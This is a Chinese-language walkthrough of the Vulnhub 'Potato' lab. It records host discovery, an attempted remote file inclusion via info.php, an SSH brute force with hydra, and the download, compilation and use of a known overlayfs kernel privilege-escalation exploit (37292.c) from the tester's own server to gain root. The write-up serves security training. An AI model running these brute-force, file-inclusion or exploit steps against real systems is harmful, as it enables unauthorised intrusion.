Vulnhub之Potato suncsr靶机详细测试过程
Potato suncsr
作者: jason_huawen
目标主机基本信息
名称:Potato (SunCSR): 1
地址:
https://www.vulnhub.com/entry/potato-suncsr-1,556/
提示:
Hint: "If you ever get stuck, try again with the name of the lab"
识别目标主机IP地址
(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.64.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:be:bb:0d 1 60 PCS Systemtechnik GmbH
192.168.56.234 08:00:27:be:bc:8f 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.234
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.234 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-28 02:22 EST
Nmap scan report for bogon (192.168.56.234)
Host is up (0.00011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Potato
|_http-server-header: Apache/2.4.7 (Ubuntu)
7120/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 b1:a8:49:bc:75:01:97:10:da:6a:fa:79:2f:12:41:30 (DSA)
| 2048 0d:6c:93:2a:1b:6c:10:bb:d4:01:4d:9c:42:34:36:df (RSA)
| 256 fc:96:d8:e5:a7:aa:d2:46:9b:00:bd:f2:be:45:cf:b5 (ECDSA)
|_ 256 e3:b0:57:45:d3:83:44:45:af:3a:99:94:f8:25:a4:6c (ED25519)
MAC Address: 08:00:27:BE:BC:8F (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.60 seconds
NMAP扫描结果表明目标主机有2个开放端口:80(HTTP)、7120(SSH)
Get Access
访问80端口,访问土豆图片,将其下载到Kali Linux本地:
┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ ls
nmap_full_scan potato.jpg
┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ steghide extract -sf potato.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ stegseek potato.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.68% (133.0 MB)
[!] error: Could not find a valid passphrase.
没有提取相应的信息。
┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ curl http://192.168.56.234/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /robots.txt was not found on this server.</p>
<hr>
<address>Apache/2.4.7 (Ubuntu) Server at 192.168.56.234 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ nikto -h http://192.168.56.234
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.234
+ Target Hostname: 192.168.56.234
+ Target Port: 80
+ Start Time: 2022-11-28 02:25:33 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 28e, size: 5aec9609b29d1, mtime: gzip
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.29
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ 7915 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2022-11-28 02:26:21 (GMT-5) (48 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Nikto提示有RFI漏洞,但是却没有成功:
──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ vim test.txt
┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
^C
Keyboard interrupt received, exiting.
┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
─(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ curl http://192.168.56.234/info.php?file=http://192.168.56.206/test.txt
扫描一下有什么目录:
┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ gobuster dir -u http://192.168.56.234/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.234/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/28 02:26:55 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 294]
Progress: 214857 / 220561 (97.41%)===============================================================
2022/11/28 02:27:10 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ gobuster dir -u http://192.168.56.234/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.sh,.html,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.234/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: html,txt,php,sh
[+] Timeout: 10s
===============================================================
2022/11/28 02:27:24 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 286]
/.php (Status: 403) [Size: 285]
/index.html (Status: 200) [Size: 654]
/info.php (Status: 200) [Size: 87429]
/.php (Status: 403) [Size: 285]
/.html (Status: 403) [Size: 286]
/server-status (Status: 403) [Size: 294]
Progress: 1096346 / 1102805 (99.41%)===============================================================
2022/11/28 02:28:50 Finished
===============================================================
看来80端口方向暂时搁置。
由于图片为potato,猜测用户名为potato(哈哈),其实作者有提示:Hint: "If you ever get stuck, try again with the name of the lab"
用户hydra破解一下密码:
┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ hydra -l potato -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.234 -s 7120
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-28 02:39:36
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.234:7120/
[STATUS] 166.00 tries/min, 166 tries in 00:01h, 14344234 to do in 1440:12h, 15 active
[STATUS] 129.33 tries/min, 388 tries in 00:03h, 14344012 to do in 1848:28h, 15 active
[7120][ssh] host: 192.168.56.234 login: potato password: letmein
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-28 02:43:59
┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ ssh potato@192.168.56.234 -p 7120
The authenticity of host '[192.168.56.234]:7120 ([192.168.56.234]:7120)' can't be established.
ED25519 key fingerprint is SHA256:jhXxGF91LI55ANwXCLFFF/zViDY10PbLjrKkgU7Q+8Q.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.56.234]:7120' (ED25519) to the list of known hosts.
potato@192.168.56.234's password:
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)
* Documentation: https://help.ubuntu.com/
Last login: Tue Sep 8 02:04:57 2020 from 192.168.17.172
potato@ubuntu:~$ id
uid=1000(potato) gid=1000(potato) groups=1000(potato),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)
potato@ubuntu:~$ sudo -l
The program 'sudo' can be found in the following packages:
* sudo
* sudo-ldap
Try: sudo apt-get install <selected package>
提权
potato@ubuntu:/tmp$ wget http://192.168.56.206:8000/39230.c
--2022-11-28 07:51:42-- http://192.168.56.206:8000/39230.c
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8487 (8.3K) [text/x-csrc]
Saving to: ‘39230.c’
100%[====================================================================================>] 8,487 --.-K/s in 0s
2022-11-28 07:51:42 (406 MB/s) - ‘39230.c’ saved [8487/8487]
potato@ubuntu:/tmp$ gcc -o exploit 39230.c
potato@ubuntu:/tmp$ ls
39230.c exploit linpeas.sh
potato@ubuntu:/tmp$ chmod +x exploit
potato@ubuntu:/tmp$ ./exploit
Failed to open setgroups
euid: 65534, egid: 65534
potato@ubuntu:/tmp$ ./exploit
Failed to open setgroups
euid: 65534, egid: 65534
potato@ubuntu:/tmp$
换一个本地提权漏洞:
potato@ubuntu:/tmp$ wget http://192.168.56.206:8000/39277.c
--2022-11-28 07:55:15-- http://192.168.56.206:8000/39277.c
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4500 (4.4K) [text/x-csrc]
Saving to: ‘39277.c’
100%[====================================================================================>] 4,500 --.-K/s in 0s
2022-11-28 07:55:15 (824 MB/s) - ‘39277.c’ saved [4500/4500]
potato@ubuntu:/tmp$ gcc -o exploit2 39277.c -lkeyutils -Wall
39277.c:17:22: fatal error: keyutils.h: No such file or directory
#include <keyutils.h>
^
compilation terminated.
potato@ubuntu:/tmp$
Linpeas.sh脚本执行输出结果所给出的本地提权漏洞都失败。
查看目标主机的系统版本,然后用searchsploit查询:
potato@ubuntu:/tmp$ uname -a
Linux ubuntu 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ searchsploit ubuntu 3.13.0
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege E | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege E | linux/local/37293.txt
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Local Privilege Esc | linux_x86-64/local/31347.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write (2) | linux/local/31346.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free | linux/dos/43234.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Esca | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KAS | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privi | linux/local/47169.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation | linux/local/41760.txt
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ searchsploit -m linux/local/37292.c
Exploit: Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/37292
Path: /usr/share/exploitdb/exploits/linux/local/37292.c
File Type: C source, ASCII text, with very long lines (466)
Copied to: /home/kali/Vulnhub/potato-suncsr/37292.c
将37292.c脚本上传至目标主机:
potato@ubuntu:/tmp$ wget http://192.168.56.206:8000/37292.c
--2022-11-28 08:09:07-- http://192.168.56.206:8000/37292.c
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4968 (4.9K) [text/x-csrc]
Saving to: ‘37292.c’
100%[====================================================================================>] 4,968 --.-K/s in 0s
2022-11-28 08:09:07 (748 MB/s) - ‘37292.c’ saved [4968/4968]
potato@ubuntu:/tmp$ ls
31346.c 37292.c 39230.c 39277.c exploit exploit3 linpeas.sh x
potato@ubuntu:/tmp$ gcc -o exploit4 37292.c
potato@ubuntu:/tmp$ chmod +x exploit4
potato@ubuntu:/tmp$ ./exploit4
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# cd /root
# ls -alh
total 24K
drwx------ 2 root root 4.0K Sep 8 2020 .
drwxr-xr-x 22 root root 4.0K Sep 7 2020 ..
-rw------- 1 root root 108 Sep 8 2020 .bash_history
-rw-r--r-- 1 root root 3.1K Feb 19 2014 .bashrc
-rw-r--r-- 1 root root 140 Feb 19 2014 .profile
-rw-r--r-- 1 root root 52 Sep 8 2020 proof.txt
# cat proof.txt
SunCSR.Team.Potato.af6d45da1f1181347b9e2139f23c6a5b
#
成功提权,拿到root flag.
经验教训
-
CTF类需要仔细阅读作者给出的提示,比如作者就提到当没有思路的时候,需要考虑一下这个靶机的名称。
-
不能完全相信一种工具,比如linpeas.sh给出的提权漏洞都无法正确执行,但是用searchsploit给出的代码可以正确执行。
STRIVE FOR PROGRESS,NOT FOR PERFECTION
